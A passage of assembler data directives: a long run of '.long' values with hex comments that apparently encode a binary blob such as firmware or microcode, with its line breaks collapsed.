0x9abcc014 .long 2447425538 ; 0x91e0c002 .long 1158461312 ; 0x450cb780 .long 2837115400 ; 0xa91af208 .long 3759251113 ; 0xe0119ea9 .long 353668488 ; 0x15148d88 .long 2595274772 ; 0x9ab0c014 .long 2422259714 ; 0x9060c002 .long 2374557713 ; 0x8d88e011 .long 694080498 ; 0x295ed3f2 .long 3222538518 ; 0xc0140916 .long 3078658527 ; 0xb78099df .long 4060628236 ; 0xf208450c .long 3221332633 ; 0xc001a299 .long 3759248064 ; 0xe01192c0 .long 3555888520 ; 0xd3f28d88 .long 152447326 ; 0x916295e .long 2580725780 ; 0x99d2c014 .long 2443231233 ; 0x91a0c001 .long 2856440328 ; 0xaa41d208 .long 2357784593 ; 0x8c88f011 .long 3490859645 ; 0xd0124a7d .long 218507982 ; 0xd062ace .long 25889030 ; 0x18b0906 .long 2579808276 ; 0x99c4c014 .long 2657787523 ; 0x9e6a9e83 .long 218235275 ; 0xd02018b .long 2579415060 ; 0x99bec014 .long 2468397056 ; 0x9320c000 .long 2856440328 ; 0xaa41d208 .long 2357784593 ; 0x8c88f011 .long 3490859645 ; 0xd0124a7d .long 218245838 ; 0xd022ace .long 25889030 ; 0x18b0906 .long 2578497556 ; 0x99b0c014 .long 2657787523 ; 0x9e6a9e83 .long 3222143371 ; 0xc00e018b .long 3222539646 ; 0xc0140d7e .long 3221264809 ; 0xc00099a9 .long 3221328000 ; 0xc0019080 .long 3080687840 ; 0xb79f90e0 .long 3222240872 ; 0xc00f7e68 .long 3222146302 ; 0xc00e0cfe .long 2655653116 ; 0x9e4a0cfc .long 2087237023 ; 0x7c68b59f .long 2137831231 ; 0x7f6cb73f .long 167956465 ; 0xa02cff1 .long 167825392 ; 0xa00cff0 .long 211468368 ; 0xc9ac050 .long 3254788632 ; 0xc2002218 .long 546593313 ; 0x20945a21 .long 843208864 ; 0x324258a0 .long 1074182692 ; 0x4006ba24 .long 2137830815 ; 0x7f6cb59f .long 3221271681 ; 0xc000b481 .long 2839802376 ; 0xa943f208 .long 2146219935 ; 0x7fecb79f .long 2149708560 ; 0x8021f310 .long 2722230792 ; 0xa241f208 .long 2121185183 ; 0x7e6eb79f .long 2129573823 ; 0x7eeeb7bf .long 2137962463 ; 0x7f6eb7df .long 2348859394 ; 0x8c00c002 .long 2786958370 ; 0xa61d9c22 .long 2231534656 ; 0x85028440 .long 4029783709 ; 0xf0319e9d .long 184724453 ; 0xb02abe5 .long 2021176671 ; 0x7878b55f .long 2130490719 ; 0x7efcb55f .long 2637853070 ; 0x9d3a718e .long 2447949825 ; 0x91e8c001 .long 1963108929 ; 0x7502aa41 .long 2475868160 ; 0x9392c000 .long 2865877016 ; 0xaad1d018 .long 2366169138 ; 0x8d08e032 .long 2365644881 ; 0x8d00e051 .long 2662440399 ; 0x9eb19dcf .long 3042936080 ; 0xb55f8510 .long 3221389180 ; 0xc0027f7c .long 3263171228 ; 0xc2800a9c .long 25909909 ; 0x18b5a95 .long 2599157748 ; 0x9aebfff4 .long 2138879839 ; 0x7f7cb75f .long 1518912128 ; 0x5a88c280 .long 2166539009 ; 0x8122c301 .long 2443231232 ; 0x91a0c000 .long 2374557745 ; 0x8d88e031 .long 84647375 ; 0x50b9dcf .long 3042936080 ; 0xb55f8510 .long 4294213500 ; 0xfff47f7c .long 3076496153 ; 0xb75f9b19 .long 184844156 ; 0xb047f7c .long 4294865294 ; 0xfffe718e .long 3080688294 ; 0xb79f92a6 .long 3226499176 ; 0xc0507868 .long 3028356254 ; 0xb4810c9e .long 3226517504 ; 0xc050c000 .long 3034713366 ; 0xb4e20d16 .long 3072311296 ; 0xb71fc000 .long 3080683244 ; 0xb79f7eec .long 3082780014 ; 0xb7bf7d6e .long 3084877294 ; 0xb7df7dee .long 3086974574 ; 0xb7ff7e6e .long 3221389038 ; 0xc0027eee .long 2619509824 ; 0x9c228c40 .long 2718300217 ; 0xa205f839 .long 2214641680 ; 0x8400c010 .long 1552725888 ; 0x5c8cb780 .long 1159509824 ; 0x451cb740 .long 2827147784 ; 0xa882da08 .long 3490818241 ; 0xd011a8c1 .long 1485319704 ; 0x58882e18 .long 142655490 ; 0x880c002 .long 3792729344 ; 0xe2107500 .long 3221258403 ; 0xc00080a3 .long 168464546 ; 0xa0a90a2 .long 2432745472 ; 0x9100c000 .long 773115921 ; 0x2e14d011 .long 168195328 ; 0xa067500 .long 172281857 ; 0xa44d001 .long 209895504 ; 0xc82c050 .long 3221271681 ; 0xc000b481 .long 167952388 ; 0xa02c004 .long 3028356276 ; 0xb4810cb4 .long 2642919424 ; 0x9d87c000 .long 1076737856 ; 0x402db740 .long 161615298 ; 0x9a20dc2 .long 218284040 ; 0xd02c008 .long 209833968 ; 0xc81cff0 .long 2605580244 ; 0x9b4dffd4 .long 172148737 ; 0xa42c801 .long 167824144 ; 0xa00cb10 .long 216711218 ; 0xceac032 .long 3221271681 ; 0xc000b481 .long 146982913 ; 0x8c2c801 .long 143179792 ; 0x888c010 .long 3022064772 ; 0xb4210c84 .long 3076571136 ; 0xb760c000 .long 2643411210 ; 0x9d8f410a .long 226611184 ; 0xd81cff0 .long 2607284212 ; 0x9b67fff4 .long 167954433 ; 0xa02c801 .long 167821322 ; 0xa00c00a .long 210419760 ; 0xc8ac030 .long 3221271681 ; 0xc000b481 .long 146980872 ; 0x8c2c008 .long 3022064772 ; 0xb4210c84 .long 3221798912 ; 0xc008c000 .long 210242050 ; 0xc880a02 .long 3221271681 ; 0xc000b481 .long 226672832 ; 0xd82c0c0 .long 3221752210 ; 0xc0080992 .long 3221753090 ; 0xc0080d02 .long 3222538498 ; 0xc0140902 .long 3221789102 ; 0xc00899ae .long 3224373762 ; 0xc0300a02 .long 3028356238 ; 0xb4810c8e .long 3222585344 ; 0xc014c000 .long 3080689711 ; 0xb79f982f .long 3222302702 ; 0xc0106fee .long 2619509792 ; 0x9c228c20 .long 2718300217 ; 0xa205f839 .long 209896528 ; 0xc82c450 .long 3028355586 ; 0xb4810a02 .long 2969681920 ; 0xb101c000 .long 3221766688 ; 0xc0084220 .long 3224373824 ; 0xc0300a40 .long 3028356238 ; 0xb4810c8e .long 3221405696 ; 0xc002c000 .long 3226482880 ; 0xc05038c0 .long 3022064770 ; 0xb4210c82 .long 3233857536 ; 0xc0c0c000 .long 160566658 ; 0x9920d82 .long 218284040 ; 0xd02c008 .long 151175176 ; 0x902c008 .long 2575548436 ; 0x9983c014 .long 167952392 ; 0xa02c008 .long 210681904 ; 0xc8ec030 .long 3221271681 ; 0xc000b481 .long 2854091256 ; 0xaa1df9f8 .long 2420162560 ; 0x9040c000 .long 3293619725 ; 0xc450a60d .long 167906442 ; 0xa020c8a .long 3221271681 ; 0xc000b481 .long 1111535877 ; 0x4240b105 .long 788324366 ; 0x2efce00e .long 1586549380 ; 0x5e90d284 .long 167954433 ; 0xa02c801 .long 3224373824 ; 0xc0300a40 .long 3028356234 ; 0xb4810c8a .long 146980864 ; 0x8c2c000 .long 3022064772 ; 0xb4210c84 .long 2000732160 ; 0x7740c000 .long 1577891776 ; 0x5e0cb7c0 .long 2481111040 ; 0x93e2c000 .long 249483313 ; 0xeded031 .long 159518186 ; 0x9820dea .long 717294850 ; 0x2ac10d02 .long 424726609 ; 0x1950d051 .long 956350753 ; 0x3900c121 .long 2564685812 ; 0x98ddfff4 .long 2848387656 ; 0xa9c6f248 .long 3263168907 ; 0xc280018b .long 444881551 ; 0x1a845a8f .long 3223428778 ; 0xc0219eaa .long 4292099328 ; 0xffd43d00 .long 4064844351 ; 0xf2489a3f .long 4077955399 ; 0xf310a947 .long 4064837675 ; 0xf248802b .long 3293618757 ; 0xc450a245 .long 167906438 ; 0xa020c86 .long 3221271681 ; 0xc000b481 .long 1109438721 ; 0x4220b101 .long 172148737 ; 0xa42c801 .long 168345616 ; 0xa08c010 .long 210157618 ; 0xc86c032 .long 3221271681 ; 0xc000b481 .long 3221358726 ; 0xc0020886 .long 3022064792 ; 0xb4210c98 .long 3074473984 ; 0xb740c000 .long 4064828428 ; 0xf2485c0c .long 4031293637 ; 0xf048a8c5 .long 3495144017 ; 0xd053aa51 .long 3229620496 ; 0xc0801910 .long 4077915298 ; 0xf3100ca2 .long 3028387873 ; 0xb4818821 .long 3080765440 ; 0xb7a0c000 .long 3221380108 ; 0xc0025c0c .long 3222539650 ; 0xc0140d82 .long 4064844079 ; 0xf248992f .long 4064848069 ; 0xf248a8c5 .long 3495143985 ; 0xd053aa31 .long 4077918480 ; 0xf3101910 .long 1879607329 ; 0x70088821 .long 2456092671 ; 0x9264ffff .long 163712390 ; 0x9c20d86 .long 3240168714 ; 0xc1210d0a .long 4292086018 ; 0xffd40902 .long 4064844298 ; 0xf2489a0a .long 3231820210 ; 0xc0a1a9b2 .long 218369282 ; 0xd040d02 .long 4292086210 ; 0xffd409c2 .long 3233847799 ; 0xc0c099f7 .long 160566658 ; 0x9920d82 .long 155323714 ; 0x9420d42 .long 2566373396 ; 0x98f7c014 .long 2129573791 ; 0x7eeeb79f .long 2137962431 ; 0x7f6eb7bf .long 2146351071 ; 0x7feeb7df .long 2619509856 ; 0x9c228c60 .long 2656937485 ; 0x9e5da60d .long 4045691200 ; 0xf1245940 .long 3555809345 ; 0xd3f15841 .long 3008376110 ; 0xb3502d2e .long 3221373986 ; 0xc0024422 .long 4027093986 ; 0xf00893e2 .long 3758140001 ; 0xe000aa61 .long 3022334492 ; 0xb4252a1c .long 3624420386 ; 0xd8084422 .long 2233641569 ; 0x8522aa61 .long 2292834832 ; 0x88a9e210 .long 303573532 ; 0x12182a1c .long 3222183587 ; 0xc00e9ea3 .long 3122334334 ; 0xba1b0a7e .long 3254796299 ; 0xc200400b .long 556290567 ; 0x21285207 .long 2457255937 ; 0x9276c001 .long 3238043225 ; 0xc1009e59 .long 285432352 ; 0x11035a20 .long 1376371200 ; 0x5209c200 .long 3254820514 ; 0xc2009ea2 .long 2660063393 ; 0x9e8d58a1 .long 212914225 ; 0xcb0d031 .long 2829242888 ; 0xa8a2d208 .long 712818702 ; 0x2a7cc00e .long 1376240128 ; 0x5207c200 .long 712818702 ; 0x2a7cc00e .long 3523753114 ; 0xd208349a .long 4027097250 ; 0xf008a0a2 .long 2661394787 ; 0x9ea1a963 .long 707711985 ; 0x2a2ed3f1 .long 2166931969 ; 0x8128c201 .long 2283926288 ; 0x8821f310 .long 4027090178 ; 0xf0088502 .long 3525878369 ; 0xd228a261 .long 2662048039 ; 0x9eaba127 .long 755093488 ; 0x2d01cff0 .long 1497454912 ; 0x59415940 .long 3222156578 ; 0xc00e3522 .long 4294192508 ; 0xfff42d7c .long 3221265329 ; 0xc0009bb1 .long 3523777248 ; 0xd20892e0 .long 2657004065 ; 0x9e5eaa21 .long 1356333067 ; 0x50d8000b .long 3492360770 ; 0xd0293242 .long 4027097605 ; 0xf008a205 .long 3490949345 ; 0xd013a8e1 .long 4061145374 ; 0xf210291e .long 1964015657 ; 0x75108029 .long 10001988 ; 0x989e44 .long 2699161608 ; 0xa0e1f008 .long 1143386960 ; 0x4426b350 .long 2129573791 ; 0x7eeeb79f .long 2137962431 ; 0x7f6eb7bf .long 2146351071 ; 0x7feeb7df .long 2619509856 ; 0x9c228c60 .long 109422093 ; 0x685a60d .long 2661195369 ; 0x9e9e9e69 .long 1904347906 ; 0x71820b02 .long 3221228166 ; 0xc0000a86 .long 2661913096 ; 0x9ea99208 .long 2657687250 ; 0x9e6916d2 .long 1518649984 ; 0x5a84c280 .long 441634833 ; 0x1a52d011 .long 3490803970 ; 0xd0117102 .long 3555789026 ; 0xd3f108e2 .long 4294912798 ; 0xffff2b1e .long 3490812550 ; 0xd0119286 .long 1963985506 ; 0x75100a62 .long 3221226125 ; 0xc000028d .long 2658374100 ; 0x9e7391d4 .long 153226498 ; 0x9220d02 .long 2607874036 ; 0x9b70fff4 .long 3490781856 ; 0xd0111aa0 .long 1963985490 ; 0x75100a52 .long 4294942339 ; 0xffff9e83 .long 2658374354 ; 0x9e7392d2 .long 3490778374 ; 0xd0110d06 .long 3222145362 ; 0xc00e0952 .long 4294191484 ; 0xfff4297c .long 1972411233 ; 0x75909b61 .long 3221266051 ; 0xc0009e83 .long 3492909812 ; 0xd03192f4 .long 3555793504 ; 0xd3f11a60 .long 2657889102 ; 0x9e6c2b4e .long 3254820467 ; 0xc2009e73 .long 3555873433 ; 0xd3f25299 .long 153233758 ; 0x922295e .long 2605776884 ; 0x9b50fff4 .long 3254820483 ; 0xc2009e83 .long 2661896888 ; 0x9ea952b8 .long 382891408 ; 0x16d27590 .long 2444427263 ; 0x91b2ffff .long 3555892851 ; 0xd3f29e73 .long 17640798 ; 0x10d2d5e .long 2604859380 ; 0x9b42fff4 .long 2129573791 ; 0x7eeeb79f .long 2137962431 ; 0x7f6eb7bf .long 2146351071 ; 0x7feeb7df .long 2619509856 ; 0x9c228c60 .long 211873809 ; 0xca0f011 .long 3499794073 ; 0xd09a9e99 .long 3490535940 ; 0xd00d5a04 .long 3221232194 ; 0xc0001a42 .long 302223514 ; 0x1203909a .long 2655720002 ; 0x9e4b1242 .long 4294745762 ; 0xfffc9ea2 .long 3221328736 ; 0xc0019360 .long 4164522912 ; 0xf83993a0 .long 227189253 ; 0xd8aa205 .long 2553659412 ; 0x9835c014 .long 3222539662 ; 0xc0140d8e .long 227186738 ; 0xd8a9832 .long 2854091256 ; 0xaa1df9f8 .long 2443231233 ; 0x91a0c001 .long 2656175367 ; 0x9e520507 .long 226672832 ; 0xd82c0c0 .long 3221227922 ; 0xc0000992 .long 2656866368 ; 0x9e5c9040 .long 3517186502 ; 0xd1a401c6 .long 142760073 ; 0x8825889 .long 1015071744 ; 0x3c80c400 .long 3221271585 ; 0xc000b421 .long 1109438724 ; 0x4220b104 .long 2656248388 ; 0x9e532244 .long 4294930694 ; 0xffff7106 .long 2619511588 ; 0x9c229324 .long 3221271651 ; 0xc000b463 .long 4161969186 ; 0xf8129c22 .long 2619514978 ; 0x9c22a062 .long 226542080 ; 0xd80c200 .long 2656656777 ; 0x9e595d89 .long 3288336770 ; 0xc4000982 .long 3026402688 ; 0xb4633d80 .long 2986590208 ; 0xb203c000 .long 476704 ; 0x74620 .long 3240598562 ; 0xc1279c22 .long 2619513999 ; 0x9c229c8f .long 3111192586 ; 0xb971080a .long 3222755057 ; 0xc01756f1 .long 3228671105 ; 0xc0719c81 .long 3222772864 ; 0xc0179c80 .long 3110116480 ; 0xb9609c80 .long 2619490304 ; 0x9c224000 .long 2220926493 ; 0x8460a61d .long 1157936960 ; 0x4504b740 .long 3040807042 ; 0xb53f0882 .long 3038805868 ; 0xb5207f6c .long 4026550152 ; 0xf0004788 .long 2653792833 ; 0x9e2daa41 .long 1519171488 ; 0x5a8cb7a0 .long 2121053503 ; 0x7e6cb53f .long 1510523392 ; 0x5a08c200 .long 155242643 ; 0x940d093 .long 3760234153 ; 0xe0209ea9 .long 230861165 ; 0xdc2a96d .long 3221358990 ; 0xc002098e .long 4292087106 ; 0xffd40d42 .long 3072366880 ; 0xb7209920 .long 4060633620 ; 0xf2085a14 .long 142780965 ; 0x882aa25 .long 2129442111 ; 0x7eecb53f .long 2829709832 ; 0xa8a9f208 .long 3657997999 ; 0xda089eaf .long 3045108025 ; 0xb580a939 .long 3657974477 ; 0xda0842cd .long 3076565310 ; 0xb760a93e .long 3038796812 ; 0xb5205c0c .long 3040887757 ; 0xb54043cd .long 3040887629 ; 0xb540434d .long 4060628053 ; 0xf2084455 .long 3658000953 ; 0xda08aa39 .long 4031293858 ; 0xf048a9a2 .long 3507661159 ; 0xd112a967 .long 2655848760 ; 0x9e4d0938 .long 2831276048 ; 0xa8c1d810 .long 1962945056 ; 0x75002a20 .long 4031290972 ; 0xf0489e5c .long 1623370109 ; 0x60c2a97d .long 1518321792 ; 0x5a7fc080 .long 1517404672 ; 0x5a71c200 .long 1486028952 ; 0x58930098 .long 3792722068 ; 0xe2105894 .long 3040903331 ; 0xb54080a3 .long 3040888525 ; 0xb54046cd .long 3038791501 ; 0xb520474d .long 3221243853 ; 0xc00047cd .long 3783299458 ; 0xe1809182 .long 3221249472 ; 0xc0005dc0 .long 4031287940 ; 0xf0489284 .long 3624970615 ; 0xd810a977 .long 3221269057 ; 0xc000aa41 .long 3074461952 ; 0xb7409100 .long 3624950788 ; 0xd8105c04 .long 4030769729 ; 0xf040aa41 .long 4077955415 ; 0xf310a957 .long 4069031969 ; 0xf2888021 .long 4069040427 ; 0xf288a12b .long 4060652069 ; 0xf208a225 .long 3076565561 ; 0xb760aa39 .long 4064828444 ; 0xf2485c1c .long 4064848033 ; 0xf248a8a1 .long 2858525225 ; 0xaa61a229 .long 2842274022 ; 0xa969a8e6 .long 2696016456 ; 0xa0b1f248 .long 4060650855 ; 0xf2089d67 .long 4060652065 ; 0xf208a221 .long 4060651690 ; 0xf208a0aa .long 3629687085 ; 0xd858a12d .long 3629689066 ; 0xd858a8ea .long 3507595629 ; 0xd111a96d .long 3657959960 ; 0xda080a18 .long 4060653697 ; 0xf208a881 .long 3072368806 ; 0xb720a0a6 .long 4060634644 ; 0xf2085e14 .long 1489019185 ; 0x58c0a131 .long 4069021905 ; 0xf28858d1 .long 3658522805 ; 0xda10a0b5 .long 3074468449 ; 0xb740aa61 .long 3074441821 ; 0xb740425d .long 8995525 ; 0x8942c5 .long 1512096256 ; 0x5a20c200 .long 4077934748 ; 0xf310589c .long 3792732193 ; 0xe2108021 .long 2725085859 ; 0xa26d82a3 .long 2700210200 ; 0xa0f1f018 .long 2720395848 ; 0xa225f248 .long 2695754312 ; 0xa0adf248 .long 167821324 ; 0xa00c00c .long 1317844352 ; 0x4e8cb580 .long 142655494 ; 0x880c006 .long 1326232864 ; 0x4f0cb520 .long 217236526 ; 0xcf2c42e .long 3028355586 ; 0xb4810a02 .long 2969681920 ; 0xb101c000 .long 679756320 ; 0x28844220 .long 3221255232 ; 0xc0007440 .long 3074462082 ; 0xb7409182 .long 3507575820 ; 0xd1115c0c .long 3657959976 ; 0xda080a28 .long 3227035777 ; 0xc058a881 .long 3223745632 ; 0xc0267460 .long 3658518898 ; 0xda109172 .long 3072371297 ; 0xb720aa61 .long 2265334026 ; 0x8706410a .long 2647946496 ; 0x9dd47500 .long 517132290 ; 0x1ed2d002 .long 3042931784 ; 0xb55f7448 .long 3221257700 ; 0xc0007de4 .long 4061171986 ; 0xf2109112 .long 3489573497 ; 0xcffeaa79 .long 4061145661 ; 0xf2102a3d .long 4061176441 ; 0xf210a279 .long 708881017 ; 0x2a40aa79 .long 3221255424 ; 0xc0007500 .long 168464674 ; 0xa0a9122 .long 212779104 ; 0xcaec060 .long 3221271681 ; 0xc000b481 .long 2430648320 ; 0x90e0c000 .long 3227519494 ; 0xc0600a06 .long 3028356270 ; 0xb4810cae .long 3072376832 ; 0xb720c000 .long 4073213204 ; 0xf2c84d14 .long 4069042721 ; 0xf288aa21 .long 3355551933 ; 0xc801a8bd .long 2636004480 ; 0x9d1e3c80 .long 1158461248 ; 0x450cb740 .long 1514193408 ; 0x5a40c200 .long 3271645344 ; 0xc30158a0 .long 843199046 ; 0x32423246 .long 2723278856 ; 0xa251f008 .long 2574303284 ; 0x9970c034 .long 3224635966 ; 0xc0340a3e .long 3028356254 ; 0xb4810c9e .long 142786560 ; 0x882c000 .long 3022064784 ; 0xb4210c90 .long 4292132864 ; 0xffd4c000 .long 3221658258 ; 0xc0069a92 .long 3040904514 ; 0xb5408542 .long 167921308 ; 0xa02469c .long 210419760 ; 0xc8ac030 .long 3221271681 ; 0xc000b481 .long 142786562 ; 0x882c002 .long 3022064772 ; 0xb4210c84 .long 3355557888 ; 0xc801c000 .long 3221359106 ; 0xc0020a02 .long 478415360 ; 0x1c840a00 .long 3221271681 ; 0xc000b481 .long 151175617 ; 0x902c1c1 .long 155238406 ; 0x940c006 .long 159518158 ; 0x9820dce .long 4289989890 ; 0xffb40d02 .long 3233848234 ; 0xc0c09baa .long 4292087170 ; 0xffd40d82 .long 3078658584 ; 0xb7809a18 .long 3224651404 ; 0xc034468c .long 3254783150 ; 0xc2000cae .long 3028376081 ; 0xb4815a11 .long 142786560 ; 0x882c000 .long 3022064892 ; 0xb4210cfc .long 4061184000 ; 0xf210c000 .long 704948857 ; 0x2a04aa79 .long 2232055040 ; 0x850a7500 .long 1193063744 ; 0x471cb540 .long 2426585088 ; 0x90a2c000 .long 3040904452 ; 0xb5408504 .long 3078637340 ; 0xb780471c .long 3225306892 ; 0xc03e470c .long 3045067906 ; 0xb5800c82 .long 3028371340 ; 0xb481478c .long 3234381824 ; 0xc0c8c000 .long 3226470530 ; 0xc0500882 .long 3022064866 ; 0xb4210ce2 .long 3235954688 ; 0xc0e0c000 .long 3224898106 ; 0xc0380a3a .long 3028356346 ; 0xb4810cfa .long 4061184000 ; 0xf210c000 .long 3072371321 ; 0xb720aa79 .long 2266908428 ; 0x871e470c .long 2237841540 ; 0x8562c084 .long 1226618176 ; 0x491cb540 .long 3226470666 ; 0xc050090a .long 704908470 ; 0x2a040cb6 .long 953185536 ; 0x38d07500 .long 1192015136 ; 0x470cb520 .long 167952390 ; 0xa02c006 .long 2401820673 ; 0x8f28e001 .long 1208268096 ; 0x4804b540 .long 3221271681 ; 0xc000b481 .long 218284090 ; 0xd02c03a .long 3221271618 ; 0xc000b442 .long 3224635582 ; 0xc03408be .long 3022064798 ; 0xb4210c9e .long 3078995968 ; 0xb785c000 .long 1962957320 ; 0x75005a08 .long 2424487936 ; 0x9082c000 .long 2562900052 ; 0x98c2c054 .long 1225570176 ; 0x490cb780 .long 209895480 ; 0xc82c038 .long 3221271681 ; 0xc000b481 .long 2842024464 ; 0xa965da10 .long 2855662216 ; 0xaa35f288 .long 1586280224 ; 0x5e8cb720 .long 1648723202 ; 0x62458502 .long 1177401120 ; 0x462db720 .long 1100657984 ; 0x419ab540 .long 1109046592 ; 0x421ab540 .long 1117435200 ; 0x429ab540 .long 3254809664 ; 0xc2007440 .long 3045087761 ; 0xb5805a11 .long 3221242634 ; 0xc000430a .long 4065366274 ; 0xf2509102 .long 3076565482 ; 0xb760a9ea .long 2659992330 ; 0x9e8c430a .long 3084950626 ; 0xb7e09c62 .long 184704012 ; 0xb025c0c .long 3078659758 ; 0xb7809eae .long 3226486796 ; 0xc050480c .long 3028356226 ; 0xb4810c82 .long 3224420352 ; 0xc030c000 .long 3032616202 ; 0xb4c20d0a .long 3222192128 ; 0xc00ec000 .long 3224373502 ; 0xc03008fe .long 3022064782 ; 0xb4210c8e .long 4061184000 ; 0xf210c000 .long 704948857 ; 0x2a04aa79 .long 3221255424 ; 0xc0007500 .long 3292041602 ; 0xc4389182 .long 3032550538 ; 0xb4c10c8a .long 2969878528 ; 0xb104c000 .long 3225305632 ; 0xc03e4220 .long 3028356262 ; 0xb4810ca6 .long 3078668288 ; 0xb780c000 .long 1962951436 ; 0x7500430c .long 2476916737 ; 0x93a2c001 .long 704692256 ; 0x2a00c020 .long 3221320960 ; 0xc0017500 .long 3294662882 ; 0xc46090e2 .long 3032550562 ; 0xb4c10ca2 .long 2969878528 ; 0xb104c000 .long 143278624 ; 0x88a4220 .long 211992672 ; 0xca2c060 .long 3221271585 ; 0xc000b421 .long 151175172 ; 0x902c004 .long 211206192 ; 0xc96c030 .long 3221271617 ; 0xc000b441 .long 1124906880 ; 0x430cb780 .long 712888286 ; 0x2a7dcfde .long 1124906368 ; 0x430cb580 .long 150519810 ; 0x8f8c002 .long 216842254 ; 0xcecc00e .long 3221271585 ; 0xc000b421 .long 167952897 ; 0xa02c201 .long 3221271681 ; 0xc000b481 .long 2231549956 ; 0x8502c004 .long 1302115648 ; 0x4d9cb540 .long 1124906784 ; 0x430cb720 .long 211206192 ; 0xc96c030 .long 3221271585 ; 0xc000b421 .long 1124906880 ; 0x430cb780 .long 1962945028 ; 0x75002a04 .long 2430779392 ; 0x90e2c000 .long 1217181568 ; 0x488cb780 .long 3045067268 ; 0xb5800a04 .long 3076475020 ; 0xb75f488c .long 3078651388 ; 0xb7807dfc .long 2639217420 ; 0x9d4f430c .long 3045066123 ; 0xb580058b .long 3224653964 ; 0xc034508c .long 3078658585 ; 0xb7809a19 .long 3223339916 ; 0xc020438c .long 1962945024 ; 0x75002a00 .long 679264270 ; 0x287cc00e .long 2104276255 ; 0x7d6cb51f .long 2420293634 ; 0x9042c002 .long 2848387664 ; 0xa9c6f250 .long 218284065 ; 0xd02c021 .long 3222277500 ; 0xc0100d7c .long 4289988994 ; 0xffb40982 .long 4065368737 ; 0xf2509aa1 .long 3223431630 ; 0xc021a9ce .long 222039298 ; 0xd3c0d02 .long 159563784 ; 0x982c008 .long 2593718196 ; 0x9a98ffb4 .long 1133295488 ; 0x438cb780 .long 704693249 ; 0x2a00c401 .long 3221255424 ; 0xc0007500 .long 4060648034 ; 0xf2089262 .long 4060654189 ; 0xf208aa6d .long 151431409 ; 0x906a8f1 .long 2121053535 ; 0x7e6cb55f .long 167821328 ; 0xa00c010 .long 2725114376 ; 0xa26df208 .long 142655496 ; 0x880c008 .long 2700210696 ; 0xa0f1f208 .long 2445328384 ; 0x91c0c000 .long 2837967432 ; 0xa927f248 .long 2854875720 ; 0xaa29f248 .long 2838295114 ; 0xa92cf24a .long 2830234184 ; 0xa8b1f248 .long 2149708560 ; 0x8021f310 .long 2191778320 ; 0x82a3e210 .long 2720395848 ; 0xa225f248 .long 2695754312 ; 0xa0adf248 .long 1133295488 ; 0x438cb780 .long 712888286 ; 0x2a7dcfde .long 1133294976 ; 0x438cb580 .long 1133295488 ; 0x438cb780 .long 704692257 ; 0x2a00c021 .long 3221320960 ; 0xc0017500 .long 3076559138 ; 0xb7609122 .long 3223405588 ; 0xc0214414 .long 219417858 ; 0xd140d02 .long 163758082 ; 0x9c2c002 .long 2589654964 ; 0x9a5affb4 .long 1150596960 ; 0x4494b760 .long 218284065 ; 0xd02c021 .long 163712260 ; 0x9c20d04 .long 2589130676 ; 0x9a52ffb4 .long 1142732608 ; 0x441cb740 .long 2858021392 ; 0xaa59f210 .long 1149548352 ; 0x4484b740 .long 2831282768 ; 0xa8c1f250 .long 1133819680 ; 0x4394b720 .long 2149708560 ; 0x8021f310 .long 2191778320 ; 0x82a3e210 .long 754896863 ; 0x2cfecfdf .long 1133819168 ; 0x4394b520 .long 1141683584 ; 0x440cb580 .long 1150072096 ; 0x448cb520 .long 1133819680 ; 0x4394b720 .long 3288440396 ; 0xc4019e4c .long 1962945024 ; 0x75002a00 .long 2443362304 ; 0x91a2c000 .long 2856710736 ; 0xaa45f250 .long 2832069200 ; 0xa8cdf250 .long 440451074 ; 0x1a40c002 .long 1141683584 ; 0x440cb580 .long 3038779584 ; 0xb52018c0 .long 2655798412 ; 0x9e4c448c .long 746636288 ; 0x2c80c400 .long 3422516800 ; 0xcbff7640 .long 3045075582 ; 0xb5802a7e .long 3221242764 ; 0xc000438c .long 4292120898 ; 0xffd49142 .long 3078658165 ; 0xb7809875 .long 3422438284 ; 0xcbfe438c .long 3045075581 ; 0xb5802a7d .long 3076473740 ; 0xb75f438c .long 1988132724 ; 0x76807f74 .long 2472722432 ; 0x9362c000 .long 1577891680 ; 0x5e0cb760 .long 759237948 ; 0x2d410d3c .long 2850484296 ; 0xa9e6f048 .long 1561173587 ; 0x5d0d9e53 .long 3223395588 ; 0xc0211d04 .long 4290002176 ; 0xffb43d00 .long 3078658565 ; 0xb7809a05 .long 3076480524 ; 0xb75f5e0c .long 4064837476 ; 0xf2487f64 .long 3076565255 ; 0xb760a907 .long 4027604508 ; 0xf0105e1c .long 4032331813 ; 0xf0588025 .long 3078660709 ; 0xb780a265 .long 3238019980 ; 0xc100438c .long 1962945024 ; 0x75002a00 .long 2437070848 ; 0x9142c000 .long 2597912500 ; 0x9ad8ffb4 .long 1133295488 ; 0x438cb780 .long 712888062 ; 0x2a7dcefe .long 1133294976 ; 0x438cb580 .long 1124906880 ; 0x430cb780 .long 704692228 ; 0x2a00c004 .long 3221386496 ; 0xc0027500 .long 3511849634 ; 0xd15292a2 .long 3072330456 ; 0xb7200ad8 .long 3658498442 ; 0xda10418a .long 3121195553 ; 0xba09aa21 .long 3122937858 ; 0xba244002 .long 168574978 ; 0xa0c4002 .long 3221385288 ; 0xc0027048 .long 3074396408 ; 0xb73f90f8 .long 3076554476 ; 0xb7607eec .long 3221507732 ; 0xc0044e94 .long 220072322 ; 0xd1e0982 .long 169005073 ; 0xa12d011 .long 712818702 ; 0x2a7cc00e .long 2129442207 ; 0x7eecb59f .long 2579955636 ; 0x99c6ffb4 .long 1326757728 ; 0x4f14b760 .long 159563778 ; 0x982c002 .long 4289989902 ; 0xffb40d0e .long 3074464191 ; 0xb74099bf .long 4060630684 ; 0xf2084e9c .long 3074468409 ; 0xb740aa39 .long 4061155076 ; 0xf2104f04 .long 3076499617 ; 0xb75fa8a1 .long 4064837356 ; 0xf2487eec .long 3271665826 ; 0xc301a8a2 .long 3040903456 ; 0xb5408120 .long 1887587996 ; 0x70824e9c .long 2200092673 ; 0x8322c001 .long 1325708608 ; 0x4f04b540 .long 2458304512 ; 0x9286c000 .long 1645846091 ; 0x62199e4b .long 4077936791 ; 0xf3106097 .long 3792734241 ; 0xe2108821 .long 151161507 ; 0x9028aa3 .long 2129442143 ; 0x7eecb55f .long 167821328 ; 0xa00c010 .long 1317844352 ; 0x4e8cb580 .long 142655496 ; 0x880c008 .long 1326232864 ; 0x4f0cb520 .long 1133295488 ; 0x438cb780 .long 973127745 ; 0x3a00c041 .long 1133294976 ; 0x438cb580 .long 1133295488 ; 0x438cb780 .long 704692229 ; 0x2a00c005 .long 3221517568 ; 0xc0047500 .long 4061172034 ; 0xf2109142 .long 4061178306 ; 0xf210a9c2 .long 163752261 ; 0x9c2a945 .long 209849666 ; 